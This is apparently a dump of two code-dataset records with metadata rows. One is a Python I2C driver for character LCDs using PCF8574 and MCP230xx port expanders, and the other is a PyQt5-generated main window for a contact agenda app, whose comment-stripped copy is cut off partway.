MCP23008_IODIR = 0x00
MCP23008_GPIO = 0x09
# MCP23017 Register addresses
MCP23017_IODIRA = 0x00
MCP23017_IODIRB = 0x01
MCP23017_GPIOA = 0x12
MCP23017_GPIOB = 0x13
class CharLCD(BaseCharLCD):
def __init__(self, i2c_expander, address, expander_params=None, port=1,
cols=20, rows=4, dotsize=8,
charmap='A02',
auto_linebreaks=True,
backlight_enabled=True):
"""
CharLCD via PCF8574 I2C port expander:
Pin mapping::
7 | 6 | 5 | 4 | 3 | 2 | 1 | 0
D7 | D6 | D5 | D4 | BL | EN | RW | RS
CharLCD via MCP23008 and MCP23017 I2C port expanders:
        Adafruit I2C/SPI LCD Backpack is supported.
        Warning: You might need a level shifter (one that supports I²C)
        between the SCL/SDA connections on the MCP chip / backpack and the Raspberry Pi.
        Otherwise you might damage the Pi and possibly any other 3.3V I²C devices
        connected on the I²C bus, or cause reliability issues. The SCL/SDA pins are rated
        0.7*VDD on the MCP23008, so they need 3.5V when 5V is applied to drive the LCD.
        The MCP23008 and MCP23017 need to be connected exactly the same way as the backpack.
For complete schematics see the adafruit page at:
https://learn.adafruit.com/i2c-spi-lcd-backpack/
        4-bit operation; only I2C is supported.
Pin mapping::
7 | 6 | 5 | 4 | 3 | 2 | 1 | 0
BL | D7 | D6 | D5 | D4 | E | RS | -
:param address: The I2C address of your LCD.
:type address: int
:param i2c_expander: Set your I²C chip type. Supported: "PCF8574", "MCP23008", "MCP23017".
:type i2c_expander: string
:param expander_params: Parameters for expanders, in a dictionary. Only needed for MCP23017
gpio_bank - This must be either ``A`` or ``B``
If you have a HAT, A is usually marked 1 and B is 2
Example: expander_params={'gpio_bank': 'A'}
:type expander_params: dictionary
:param port: The I2C port number. Default: ``1``.
:type port: int
:param cols: Number of columns per row (usually 16 or 20). Default: ``20``.
:type cols: int
:param rows: Number of display rows (usually 1, 2 or 4). Default: ``4``.
:type rows: int
        :param dotsize: Some 1-line displays allow a font height of 10px.
Allowed: 8 or 10. Default: ``8``.
:type dotsize: int
:param charmap: The character map used. Depends on your LCD. This must
be either ``A00`` or ``A02``. Default: ``A02``.
:type charmap: str
:param auto_linebreaks: Whether or not to automatically insert line breaks.
Default: ``True``.
:type auto_linebreaks: bool
:param backlight_enabled: Whether the backlight is enabled initially. Default: ``True``.
:type backlight_enabled: bool
"""
# Set own address and port.
self._address = address
self._port = port
# Set i2c expander, 'PCF8574', 'MCP23008' and 'MCP23017' are supported.
if i2c_expander in ['PCF8574', 'MCP23008', 'MCP23017']:
self._i2c_expander = i2c_expander
else:
raise NotImplementedError('I2C expander "%s" is not supported.' % i2c_expander)
# Errorchecking for expander parameters
if expander_params is None:
if self._i2c_expander == 'MCP23017':
raise ValueError('MCP23017: expander_params[\'gpio_bank\'] is not defined, '
'must be either \'A\' or \'B\'')
else:
self._expander_params = {}
else:
if self._i2c_expander == 'MCP23017':
if expander_params['gpio_bank'] in ['A', 'B']:
self._expander_params = {}
self._expander_params['gpio_bank'] = expander_params['gpio_bank']
else:
raise ValueError('MCP23017: expander_params[\'gpio_bank\'] is \'%s\', '
'must be either \'A\' or \'B\'' % expander_params['gpio_bank'])
# Currently the I2C mode only supports 4 bit communication
self.data_bus_mode = c.LCD_4BITMODE
# Set backlight status
if self._i2c_expander == 'PCF8574':
self._backlight = PCF8574_BACKLIGHT if backlight_enabled else PCF8574_NOBACKLIGHT
elif self._i2c_expander in ['MCP23008', 'MCP23017']:
self._backlight = MCP230XX_BACKLIGHT if backlight_enabled else MCP230XX_NOBACKLIGHT
# Call superclass
super(CharLCD, self).__init__(cols, rows, dotsize,
charmap=charmap,
auto_linebreaks=auto_linebreaks)
# Refresh backlight status
self.backlight_enabled = backlight_enabled
def _init_connection(self):
self.bus = SMBus(self._port)
if self._i2c_expander == 'PCF8574':
c.msleep(50)
elif self._i2c_expander in ['MCP23008', 'MCP23017']:
# Variable for storing data and applying bitmasks and shifting.
self._mcp_data = 0
# Set iodir register value according to expander
# If using MCP23017 set which gpio bank to use, A or B
if self._i2c_expander == 'MCP23008':
IODIR = MCP23008_IODIR
self._mcp_gpio = MCP23008_GPIO
elif self._i2c_expander == 'MCP23017':
# Set gpio bank A or B
if self._expander_params['gpio_bank'] == 'A':
IODIR = MCP23017_IODIRA
self._mcp_gpio = MCP23017_GPIOA
elif self._expander_params['gpio_bank'] == 'B':
IODIR = MCP23017_IODIRB
self._mcp_gpio = MCP23017_GPIOB
# Set IO DIRection to output on all GPIOs (GP0-GP7)
self.bus.write_byte_data(self._address, IODIR, 0x00)
def _close_connection(self):
# Nothing to do here?
pass
# Properties
def _get_backlight_enabled(self):
if self._i2c_expander == 'PCF8574':
return self._backlight == PCF8574_BACKLIGHT
elif self._i2c_expander in ['MCP23008', 'MCP23017']:
return self._backlight == MCP230XX_BACKLIGHT
def _set_backlight_enabled(self, value):
if self._i2c_expander == 'PCF8574':
self._backlight = PCF8574_BACKLIGHT if value else PCF8574_NOBACKLIGHT
self.bus.write_byte(self._address, self._backlight)
elif self._i2c_expander in ['MCP23008', 'MCP23017']:
if value is True:
self._mcp_data |= MCP230XX_BACKLIGHT
else:
self._mcp_data &= MCP230XX_NOBACKLIGHT
self.bus.write_byte_data(self._address, self._mcp_gpio, self._mcp_data)
backlight_enabled = property(_get_backlight_enabled, _set_backlight_enabled,
doc='Whether or not to enable the backlight. Either ``True`` or ``False``.')
# Low level commands
def _send_data(self, value):
if self._i2c_expander == 'PCF8574':
self.bus.write_byte(self._address, (c.RS_DATA | (value & 0xF0)) | self._backlight)
self._pulse_data(c.RS_DATA | (value & 0xF0))
self.bus.write_byte(self._address, (c.RS_DATA |
((value << 4) & 0xF0)) | self._backlight)
self._pulse_data(c.RS_DATA | ((value << 4) & 0xF0))
elif self._i2c_expander in ['MCP23008', 'MCP23017']:
self._mcp_data |= MCP230XX_RS
self._pulse_data(value >> 4)
self._pulse_data(value & 0x0F)
def _send_instruction(self, value):
if self._i2c_expander == 'PCF8574':
self.bus.write_byte(self._address, (c.RS_INSTRUCTION |
(value & 0xF0)) | self._backlight)
self._pulse_data(c.RS_INSTRUCTION | (value & 0xF0))
self.bus.write_byte(self._address, (c.RS_INSTRUCTION |
((value << 4) & 0xF0)) | self._backlight)
self._pulse_data(c.RS_INSTRUCTION | ((value << 4) & 0xF0))
elif self._i2c_expander in ['MCP23008', 'MCP23017']:
self._mcp_data &= ~MCP230XX_RS
self._pulse_data(value >> 4)
self._pulse_data(value & 0x0F)
def _pulse_data(self, value):
"""Pulse the `enable` flag to process value."""
if self._i2c_expander == 'PCF8574':
self.bus.write_byte(self._address, ((value & ~PCF8574_E) | self._backlight))
c.usleep(1)
self.bus.write_byte(self._address, value | PCF8574_E | self._backlight)
c.usleep(1)
self.bus.write_byte(self._address, ((value & ~PCF8574_E) | self._backlight))
c.usleep(100)
elif self._i2c_expander in ['MCP23008', 'MCP23017']:
self._mcp_data &= ~MCP230XX_DATAMASK
self._mcp_data |= value << MCP230XX_DATASHIFT
self._mcp_data &= ~MCP230XX_E
self.bus.write_byte_data(self._address, self._mcp_gpio, self._mcp_data)
c.usleep(1)
self._mcp_data |= MCP230XX_E
self.bus.write_byte_data(self._address, self._mcp_gpio, self._mcp_data)
c.usleep(1)
self._mcp_data &= ~MCP230XX_E
self.bus.write_byte_data(self._address, self._mcp_gpio, self._mcp_data)
c.usleep(100)
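# --- Minimal usage sketch (not part of the original file) ---
# Assumes a PCF8574 backpack at the common, but board-dependent, address
# 0x27 on I2C port 1; verify both with `i2cdetect -y 1` first. Guarded so
# it only runs when this module is executed directly on a Pi.
if __name__ == '__main__':
    lcd = CharLCD(i2c_expander='PCF8574', address=0x27, port=1,
                  cols=16, rows=2, charmap='A02')
    lcd.write_string('Hello, world!')  # inherited from BaseCharLCD
    lcd.backlight_enabled = False      # exercises the property defined above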
| 42.235075
| 99
| 0.616044
|
from __future__ import print_function, division, absolute_import, unicode_literals
from smbus import SMBus
from . import common as c
from .lcd import BaseCharLCD
PCF8574_BACKLIGHT = 0x08
PCF8574_NOBACKLIGHT = 0x00
PCF8574_E = 0x4
PIN_READ_WRITE = 0x2
PIN_REGISTER_SELECT = 0x1
MCP230XX_BACKLIGHT = 0x80
MCP230XX_NOBACKLIGHT = 0x7f
MCP230XX_RS = 0x02
MCP230XX_E = 0x4
MCP230XX_DATAMASK = 0x78
MCP230XX_DATASHIFT = 3
MCP23008_IODIR = 0x00
MCP23008_GPIO = 0x09
MCP23017_IODIRA = 0x00
MCP23017_IODIRB = 0x01
MCP23017_GPIOA = 0x12
MCP23017_GPIOB = 0x13
class CharLCD(BaseCharLCD):
def __init__(self, i2c_expander, address, expander_params=None, port=1,
cols=20, rows=4, dotsize=8,
charmap='A02',
auto_linebreaks=True,
backlight_enabled=True):
self._address = address
self._port = port
if i2c_expander in ['PCF8574', 'MCP23008', 'MCP23017']:
self._i2c_expander = i2c_expander
else:
raise NotImplementedError('I2C expander "%s" is not supported.' % i2c_expander)
if expander_params is None:
if self._i2c_expander == 'MCP23017':
raise ValueError('MCP23017: expander_params[\'gpio_bank\'] is not defined, '
'must be either \'A\' or \'B\'')
else:
self._expander_params = {}
else:
if self._i2c_expander == 'MCP23017':
if expander_params['gpio_bank'] in ['A', 'B']:
self._expander_params = {}
self._expander_params['gpio_bank'] = expander_params['gpio_bank']
else:
raise ValueError('MCP23017: expander_params[\'gpio_bank\'] is \'%s\', '
'must be either \'A\' or \'B\'' % expander_params['gpio_bank'])
self.data_bus_mode = c.LCD_4BITMODE
if self._i2c_expander == 'PCF8574':
self._backlight = PCF8574_BACKLIGHT if backlight_enabled else PCF8574_NOBACKLIGHT
elif self._i2c_expander in ['MCP23008', 'MCP23017']:
self._backlight = MCP230XX_BACKLIGHT if backlight_enabled else MCP230XX_NOBACKLIGHT
super(CharLCD, self).__init__(cols, rows, dotsize,
charmap=charmap,
auto_linebreaks=auto_linebreaks)
self.backlight_enabled = backlight_enabled
def _init_connection(self):
self.bus = SMBus(self._port)
if self._i2c_expander == 'PCF8574':
c.msleep(50)
elif self._i2c_expander in ['MCP23008', 'MCP23017']:
self._mcp_data = 0
if self._i2c_expander == 'MCP23008':
IODIR = MCP23008_IODIR
self._mcp_gpio = MCP23008_GPIO
elif self._i2c_expander == 'MCP23017':
if self._expander_params['gpio_bank'] == 'A':
IODIR = MCP23017_IODIRA
self._mcp_gpio = MCP23017_GPIOA
elif self._expander_params['gpio_bank'] == 'B':
IODIR = MCP23017_IODIRB
self._mcp_gpio = MCP23017_GPIOB
self.bus.write_byte_data(self._address, IODIR, 0x00)
def _close_connection(self):
pass
def _get_backlight_enabled(self):
if self._i2c_expander == 'PCF8574':
return self._backlight == PCF8574_BACKLIGHT
elif self._i2c_expander in ['MCP23008', 'MCP23017']:
return self._backlight == MCP230XX_BACKLIGHT
def _set_backlight_enabled(self, value):
if self._i2c_expander == 'PCF8574':
self._backlight = PCF8574_BACKLIGHT if value else PCF8574_NOBACKLIGHT
self.bus.write_byte(self._address, self._backlight)
elif self._i2c_expander in ['MCP23008', 'MCP23017']:
if value is True:
self._mcp_data |= MCP230XX_BACKLIGHT
else:
self._mcp_data &= MCP230XX_NOBACKLIGHT
self.bus.write_byte_data(self._address, self._mcp_gpio, self._mcp_data)
backlight_enabled = property(_get_backlight_enabled, _set_backlight_enabled,
doc='Whether or not to enable the backlight. Either ``True`` or ``False``.')
def _send_data(self, value):
if self._i2c_expander == 'PCF8574':
self.bus.write_byte(self._address, (c.RS_DATA | (value & 0xF0)) | self._backlight)
self._pulse_data(c.RS_DATA | (value & 0xF0))
self.bus.write_byte(self._address, (c.RS_DATA |
((value << 4) & 0xF0)) | self._backlight)
self._pulse_data(c.RS_DATA | ((value << 4) & 0xF0))
elif self._i2c_expander in ['MCP23008', 'MCP23017']:
self._mcp_data |= MCP230XX_RS
self._pulse_data(value >> 4)
self._pulse_data(value & 0x0F)
def _send_instruction(self, value):
if self._i2c_expander == 'PCF8574':
self.bus.write_byte(self._address, (c.RS_INSTRUCTION |
(value & 0xF0)) | self._backlight)
self._pulse_data(c.RS_INSTRUCTION | (value & 0xF0))
self.bus.write_byte(self._address, (c.RS_INSTRUCTION |
((value << 4) & 0xF0)) | self._backlight)
self._pulse_data(c.RS_INSTRUCTION | ((value << 4) & 0xF0))
elif self._i2c_expander in ['MCP23008', 'MCP23017']:
self._mcp_data &= ~MCP230XX_RS
self._pulse_data(value >> 4)
self._pulse_data(value & 0x0F)
def _pulse_data(self, value):
if self._i2c_expander == 'PCF8574':
self.bus.write_byte(self._address, ((value & ~PCF8574_E) | self._backlight))
c.usleep(1)
self.bus.write_byte(self._address, value | PCF8574_E | self._backlight)
c.usleep(1)
self.bus.write_byte(self._address, ((value & ~PCF8574_E) | self._backlight))
c.usleep(100)
elif self._i2c_expander in ['MCP23008', 'MCP23017']:
self._mcp_data &= ~MCP230XX_DATAMASK
self._mcp_data |= value << MCP230XX_DATASHIFT
self._mcp_data &= ~MCP230XX_E
self.bus.write_byte_data(self._address, self._mcp_gpio, self._mcp_data)
c.usleep(1)
self._mcp_data |= MCP230XX_E
self.bus.write_byte_data(self._address, self._mcp_gpio, self._mcp_data)
c.usleep(1)
self._mcp_data &= ~MCP230XX_E
self.bus.write_byte_data(self._address, self._mcp_gpio, self._mcp_data)
c.usleep(100)
| true
| true
|
1c447cd652110e5c98f244fcb259d5250072d56d
| 10,423
|
py
|
Python
|
Agenda Pessoal/src/views/views_classes/view_principal/classeTelaPrincipal.py
|
jao-victor/Agenda-Pessoal
|
39c9d1a61ff36c93daf49b799d45c665330b7155
|
[
"MIT"
] | 1
|
2022-01-29T16:27:50.000Z
|
2022-01-29T16:27:50.000Z
|
Agenda Pessoal/src/views/views_classes/view_principal/classeTelaPrincipal.py
|
jao-victor/Agenda-Pessoal
|
39c9d1a61ff36c93daf49b799d45c665330b7155
|
[
"MIT"
] | null | null | null |
Agenda Pessoal/src/views/views_classes/view_principal/classeTelaPrincipal.py
|
jao-victor/Agenda-Pessoal
|
39c9d1a61ff36c93daf49b799d45c665330b7155
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'telaPrincipal.ui'
#
# Created by: PyQt5 UI code generator 5.14.1
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName("MainWindow")
MainWindow.resize(950, 650)
MainWindow.setMinimumSize(QtCore.QSize(950, 650))
MainWindow.setMaximumSize(QtCore.QSize(16777215, 16777215))
MainWindow.setStyleSheet("")
self.centralwidget = QtWidgets.QWidget(MainWindow)
self.centralwidget.setMinimumSize(QtCore.QSize(0, 0))
self.centralwidget.setMaximumSize(QtCore.QSize(16777215, 16777215))
self.centralwidget.setStyleSheet("background-color: rgb(255, 255, 255);")
self.centralwidget.setObjectName("centralwidget")
self.verticalLayout = QtWidgets.QVBoxLayout(self.centralwidget)
self.verticalLayout.setContentsMargins(0, 0, 0, 0)
self.verticalLayout.setSpacing(0)
self.verticalLayout.setObjectName("verticalLayout")
self.navbar = QtWidgets.QFrame(self.centralwidget)
self.navbar.setMinimumSize(QtCore.QSize(0, 51))
self.navbar.setMaximumSize(QtCore.QSize(16777215, 51))
self.navbar.setStyleSheet("#navbar{\n"
" background-color: rgb(63, 125, 174);\n"
"}\n"
"")
self.navbar.setFrameShape(QtWidgets.QFrame.StyledPanel)
self.navbar.setFrameShadow(QtWidgets.QFrame.Raised)
self.navbar.setObjectName("navbar")
self.logo_usuario = QtWidgets.QFrame(self.navbar)
self.logo_usuario.setGeometry(QtCore.QRect(3, 3, 61, 41))
self.logo_usuario.setStyleSheet("#logo_usuario{\n"
" background-color: rgb(63, 125, 174);\n"
" background-image: url(:/imagens/icone_user.png);\n"
" background-repeat: no-repeat;\n"
"}")
self.logo_usuario.setFrameShape(QtWidgets.QFrame.NoFrame)
self.logo_usuario.setFrameShadow(QtWidgets.QFrame.Raised)
self.logo_usuario.setObjectName("logo_usuario")
self.label_2 = QtWidgets.QLabel(self.navbar)
self.label_2.setGeometry(QtCore.QRect(75, 10, 91, 31))
font = QtGui.QFont()
font.setPointSize(12)
self.label_2.setFont(font)
self.label_2.setStyleSheet("background-color: rgb(63, 125, 174);\n"
"color:white;")
self.label_2.setObjectName("label_2")
self.verticalLayout.addWidget(self.navbar)
self.barra_de_busca = QtWidgets.QFrame(self.centralwidget)
self.barra_de_busca.setMinimumSize(QtCore.QSize(0, 51))
self.barra_de_busca.setMaximumSize(QtCore.QSize(16777215, 51))
self.barra_de_busca.setFrameShape(QtWidgets.QFrame.NoFrame)
self.barra_de_busca.setFrameShadow(QtWidgets.QFrame.Raised)
self.barra_de_busca.setObjectName("barra_de_busca")
self.horizontalLayout_2 = QtWidgets.QHBoxLayout(self.barra_de_busca)
self.horizontalLayout_2.setContentsMargins(0, 0, 0, 0)
self.horizontalLayout_2.setSpacing(0)
self.horizontalLayout_2.setObjectName("horizontalLayout_2")
self.frame = QtWidgets.QFrame(self.barra_de_busca)
self.frame.setFrameShape(QtWidgets.QFrame.NoFrame)
self.frame.setFrameShadow(QtWidgets.QFrame.Raised)
self.frame.setObjectName("frame")
self.pesquisar_contato = QtWidgets.QLineEdit(self.frame)
self.pesquisar_contato.setGeometry(QtCore.QRect(10, 20, 191, 21))
self.pesquisar_contato.setMaximumSize(QtCore.QSize(191, 21))
self.pesquisar_contato.setStyleSheet("color: black;")
self.pesquisar_contato.setObjectName("pesquisar_contato")
self.b_procurar = QtWidgets.QPushButton(self.frame)
self.b_procurar.setGeometry(QtCore.QRect(210, 17, 80, 25))
self.b_procurar.setMaximumSize(QtCore.QSize(80, 25))
self.b_procurar.setStyleSheet("#b_procurar{\n"
" color: white;\n"
" background-color: rgb(63, 125, 174);\n"
" border-style: solid;\n"
"}\n"
"\n"
"#b_procurar:hover{\n"
" background-color: rgb(0, 255, 127);\n"
"}\n"
"\n"
"#b_procurar:pressed{\n"
" background-color: rgb(255, 255, 0);\n"
"}")
self.b_procurar.setObjectName("b_procurar")
self.horizontalLayout_2.addWidget(self.frame)
self.frame_2 = QtWidgets.QFrame(self.barra_de_busca)
self.frame_2.setMinimumSize(QtCore.QSize(100, 51))
self.frame_2.setMaximumSize(QtCore.QSize(100, 16777215))
self.frame_2.setFrameShape(QtWidgets.QFrame.NoFrame)
self.frame_2.setFrameShadow(QtWidgets.QFrame.Raised)
self.frame_2.setObjectName("frame_2")
self.b_sair = QtWidgets.QPushButton(self.frame_2)
self.b_sair.setGeometry(QtCore.QRect(30, 10, 60, 35))
self.b_sair.setMinimumSize(QtCore.QSize(60, 35))
self.b_sair.setMaximumSize(QtCore.QSize(60, 35))
self.b_sair.setStyleSheet("#b_sair{\n"
" color: white;\n"
" background-color: rgb(63, 125, 174);\n"
" border-style: solid;\n"
"}\n"
"\n"
"#b_sair:hover{\n"
" color:black;\n"
" background-color: rgb(255, 14, 14);\n"
"}\n"
"\n"
"")
self.b_sair.setObjectName("b_sair")
self.horizontalLayout_2.addWidget(self.frame_2)
self.verticalLayout.addWidget(self.barra_de_busca)
self.scrollArea = QtWidgets.QScrollArea(self.centralwidget)
self.scrollArea.setMinimumSize(QtCore.QSize(0, 100))
self.scrollArea.setStyleSheet("")
self.scrollArea.setFrameShape(QtWidgets.QFrame.NoFrame)
self.scrollArea.setWidgetResizable(True)
self.scrollArea.setObjectName("scrollArea")
self.scrollAreaWidgetContents_2 = QtWidgets.QWidget()
self.scrollAreaWidgetContents_2.setGeometry(QtCore.QRect(0, 0, 950, 506))
self.scrollAreaWidgetContents_2.setObjectName("scrollAreaWidgetContents_2")
self.verticalLayout_2 = QtWidgets.QVBoxLayout(self.scrollAreaWidgetContents_2)
self.verticalLayout_2.setContentsMargins(0, 0, 0, 1)
self.verticalLayout_2.setObjectName("verticalLayout_2")
self.tabela_de_contatos = QtWidgets.QTableView(self.scrollAreaWidgetContents_2)
self.tabela_de_contatos.setStyleSheet("#tabela_de_contatos{\n"
" color: black;\n"
" \n"
" background-color: rgb(255, 255, 224);\n"
"}")
self.tabela_de_contatos.setFrameShape(QtWidgets.QFrame.NoFrame)
self.tabela_de_contatos.setObjectName("tabela_de_contatos")
self.verticalLayout_2.addWidget(self.tabela_de_contatos)
self.scrollArea.setWidget(self.scrollAreaWidgetContents_2)
self.verticalLayout.addWidget(self.scrollArea)
self.barra_de_botoes = QtWidgets.QFrame(self.centralwidget)
self.barra_de_botoes.setMaximumSize(QtCore.QSize(16777215, 60))
self.barra_de_botoes.setFrameShape(QtWidgets.QFrame.StyledPanel)
self.barra_de_botoes.setFrameShadow(QtWidgets.QFrame.Raised)
self.barra_de_botoes.setObjectName("barra_de_botoes")
self.horizontalLayout = QtWidgets.QHBoxLayout(self.barra_de_botoes)
self.horizontalLayout.setContentsMargins(4, 0, 4, 0)
self.horizontalLayout.setSpacing(10)
self.horizontalLayout.setObjectName("horizontalLayout")
self.b_adicionar = QtWidgets.QPushButton(self.barra_de_botoes)
self.b_adicionar.setMinimumSize(QtCore.QSize(0, 33))
self.b_adicionar.setStyleSheet("#b_adicionar{\n"
" color: white;\n"
" background-color: rgb(63, 125, 174);\n"
" border-style: solid;\n"
"}\n"
"\n"
"#b_adicionar:hover{\n"
" background-color: rgb(0, 255, 127);\n"
"}\n"
"\n"
"#b_adicionar:pressed{\n"
" background-color: rgb(255, 255, 0);\n"
"}")
self.b_adicionar.setObjectName("b_adicionar")
self.horizontalLayout.addWidget(self.b_adicionar)
self.b_atualizar = QtWidgets.QPushButton(self.barra_de_botoes)
self.b_atualizar.setMinimumSize(QtCore.QSize(0, 33))
self.b_atualizar.setStyleSheet("#b_atualizar{\n"
" color: white;\n"
" background-color: rgb(63, 125, 174);\n"
" border-style: solid;\n"
"}\n"
"\n"
"#b_atualizar:hover{\n"
" background-color: rgb(0, 255, 127);\n"
"}\n"
"\n"
"#b_atualizar:pressed{\n"
" background-color: rgb(255, 255, 0);\n"
"}")
self.b_atualizar.setObjectName("b_atualizar")
self.horizontalLayout.addWidget(self.b_atualizar)
self.b_deletar = QtWidgets.QPushButton(self.barra_de_botoes)
self.b_deletar.setMinimumSize(QtCore.QSize(0, 33))
self.b_deletar.setStyleSheet("#b_deletar{\n"
" color: white;\n"
" background-color: rgb(63, 125, 174);\n"
" border-style: solid;\n"
"}\n"
"\n"
"#b_deletar:hover{\n"
" background-color: rgb(0, 255, 127);\n"
"}\n"
"\n"
"#b_deletar:pressed{\n"
" background-color: rgb(255, 255, 0);\n"
"}")
self.b_deletar.setObjectName("b_deletar")
self.horizontalLayout.addWidget(self.b_deletar)
self.refresh = QtWidgets.QPushButton(self.barra_de_botoes)
self.refresh.setMinimumSize(QtCore.QSize(0, 40))
self.refresh.setMaximumSize(QtCore.QSize(70, 16777215))
self.refresh.setStyleSheet("#refresh{\n"
" color: white;\n"
" background-color: rgb(63, 125, 174);\n"
" background-image: url(:/imagens/rotacaoE.png);\n"
" background-position:center;\n"
" border-style: solid;\n"
"}\n"
"\n"
"#refresh:hover{\n"
" background-color: rgb(0, 255, 127);\n"
"}\n"
"\n"
"#refresh:pressed{\n"
" background-color: rgb(255, 255, 0);\n"
"}")
self.refresh.setText("")
self.refresh.setObjectName("refresh")
self.horizontalLayout.addWidget(self.refresh)
self.verticalLayout.addWidget(self.barra_de_botoes)
MainWindow.setCentralWidget(self.centralwidget)
self.retranslateUi(MainWindow)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
def retranslateUi(self, MainWindow):
_translate = QtCore.QCoreApplication.translate
MainWindow.setWindowTitle(_translate("MainWindow", "MainWindow"))
self.label_2.setText(_translate("MainWindow", "UserName"))
self.b_procurar.setText(_translate("MainWindow", "Buscar"))
self.b_sair.setText(_translate("MainWindow", "Sair"))
self.b_adicionar.setText(_translate("MainWindow", "ADICIONAR"))
self.b_atualizar.setText(_translate("MainWindow", "ATUALIZAR"))
self.b_deletar.setText(_translate("MainWindow", "DELETAR"))
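# --- Illustrative wiring sketch (not part of the generated file) ---
# Standard PyQt5 boilerplate for using a pyuic5-generated class; note the
# :/imagens/ images above additionally need the project's compiled Qt
# resource module, which is not shown here.
if __name__ == '__main__':
    import sys
    app = QtWidgets.QApplication(sys.argv)
    window = QtWidgets.QMainWindow()
    ui = Ui_MainWindow()
    ui.setupUi(window)                       # builds the widget tree above
    ui.b_sair.clicked.connect(window.close)  # widgets are plain attributes
    window.show()
    sys.exit(app.exec_())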
| 43.610879
| 87
| 0.694905
|
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName("MainWindow")
MainWindow.resize(950, 650)
MainWindow.setMinimumSize(QtCore.QSize(950, 650))
MainWindow.setMaximumSize(QtCore.QSize(16777215, 16777215))
MainWindow.setStyleSheet("")
self.centralwidget = QtWidgets.QWidget(MainWindow)
self.centralwidget.setMinimumSize(QtCore.QSize(0, 0))
self.centralwidget.setMaximumSize(QtCore.QSize(16777215, 16777215))
self.centralwidget.setStyleSheet("background-color: rgb(255, 255, 255);")
self.centralwidget.setObjectName("centralwidget")
self.verticalLayout = QtWidgets.QVBoxLayout(self.centralwidget)
self.verticalLayout.setContentsMargins(0, 0, 0, 0)
self.verticalLayout.setSpacing(0)
self.verticalLayout.setObjectName("verticalLayout")
self.navbar = QtWidgets.QFrame(self.centralwidget)
self.navbar.setMinimumSize(QtCore.QSize(0, 51))
self.navbar.setMaximumSize(QtCore.QSize(16777215, 51))
self.navbar.setStyleSheet("#navbar{\n"
" background-color: rgb(63, 125, 174);\n"
"}\n"
"")
self.navbar.setFrameShape(QtWidgets.QFrame.StyledPanel)
self.navbar.setFrameShadow(QtWidgets.QFrame.Raised)
self.navbar.setObjectName("navbar")
self.logo_usuario = QtWidgets.QFrame(self.navbar)
self.logo_usuario.setGeometry(QtCore.QRect(3, 3, 61, 41))
self.logo_usuario.setStyleSheet("#logo_usuario{\n"
" background-color: rgb(63, 125, 174);\n"
" background-image: url(:/imagens/icone_user.png);\n"
" background-repeat: no-repeat;\n"
"}")
self.logo_usuario.setFrameShape(QtWidgets.QFrame.NoFrame)
self.logo_usuario.setFrameShadow(QtWidgets.QFrame.Raised)
self.logo_usuario.setObjectName("logo_usuario")
self.label_2 = QtWidgets.QLabel(self.navbar)
self.label_2.setGeometry(QtCore.QRect(75, 10, 91, 31))
font = QtGui.QFont()
font.setPointSize(12)
self.label_2.setFont(font)
self.label_2.setStyleSheet("background-color: rgb(63, 125, 174);\n"
"color:white;")
self.label_2.setObjectName("label_2")
self.verticalLayout.addWidget(self.navbar)
self.barra_de_busca = QtWidgets.QFrame(self.centralwidget)
self.barra_de_busca.setMinimumSize(QtCore.QSize(0, 51))
self.barra_de_busca.setMaximumSize(QtCore.QSize(16777215, 51))
self.barra_de_busca.setFrameShape(QtWidgets.QFrame.NoFrame)
self.barra_de_busca.setFrameShadow(QtWidgets.QFrame.Raised)
self.barra_de_busca.setObjectName("barra_de_busca")
self.horizontalLayout_2 = QtWidgets.QHBoxLayout(self.barra_de_busca)
self.horizontalLayout_2.setContentsMargins(0, 0, 0, 0)
self.horizontalLayout_2.setSpacing(0)
self.horizontalLayout_2.setObjectName("horizontalLayout_2")
self.frame = QtWidgets.QFrame(self.barra_de_busca)
self.frame.setFrameShape(QtWidgets.QFrame.NoFrame)
self.frame.setFrameShadow(QtWidgets.QFrame.Raised)
self.frame.setObjectName("frame")
self.pesquisar_contato = QtWidgets.QLineEdit(self.frame)
self.pesquisar_contato.setGeometry(QtCore.QRect(10, 20, 191, 21))
self.pesquisar_contato.setMaximumSize(QtCore.QSize(191, 21))
self.pesquisar_contato.setStyleSheet("color: black;")
self.pesquisar_contato.setObjectName("pesquisar_contato")
self.b_procurar = QtWidgets.QPushButton(self.frame)
self.b_procurar.setGeometry(QtCore.QRect(210, 17, 80, 25))
self.b_procurar.setMaximumSize(QtCore.QSize(80, 25))
self.b_procurar.setStyleSheet("#b_procurar{\n"
" color: white;\n"
" background-color: rgb(63, 125, 174);\n"
" border-style: solid;\n"
"}\n"
"\n"
"#b_procurar:hover{\n"
" background-color: rgb(0, 255, 127);\n"
"}\n"
"\n"
"#b_procurar:pressed{\n"
" background-color: rgb(255, 255, 0);\n"
"}")
self.b_procurar.setObjectName("b_procurar")
self.horizontalLayout_2.addWidget(self.frame)
self.frame_2 = QtWidgets.QFrame(self.barra_de_busca)
self.frame_2.setMinimumSize(QtCore.QSize(100, 51))
self.frame_2.setMaximumSize(QtCore.QSize(100, 16777215))
self.frame_2.setFrameShape(QtWidgets.QFrame.NoFrame)
self.frame_2.setFrameShadow(QtWidgets.QFrame.Raised)
self.frame_2.setObjectName("frame_2")
self.b_sair = QtWidgets.QPushButton(self.frame_2)
self.b_sair.setGeometry(QtCore.QRect(30, 10, 60, 35))
self.b_sair.setMinimumSize(QtCore.QSize(60, 35))
self.b_sair.setMaximumSize(QtCore.QSize(60, 35))
self.b_sair.setStyleSheet("#b_sair{\n"
" color: white;\n"
" background-color: rgb(63, 125, 174);\n"
" border-style: solid;\n"
"}\n"
"\n"
"#b_sair:hover{\n"
" color:black;\n"
" background-color: rgb(255, 14, 14);\n"
"}\n"
"\n"
"")
self.b_sair.setObjectName("b_sair")
self.horizontalLayout_2.addWidget(self.frame_2)
self.verticalLayout.addWidget(self.barra_de_busca)
self.scrollArea = QtWidgets.QScrollArea(self.centralwidget)
self.scrollArea.setMinimumSize(QtCore.QSize(0, 100))
self.scrollArea.setStyleSheet("")
self.scrollArea.setFrameShape(QtWidgets.QFrame.NoFrame)
self.scrollArea.setWidgetResizable(True)
self.scrollArea.setObjectName("scrollArea")
self.scrollAreaWidgetContents_2 = QtWidgets.QWidget()
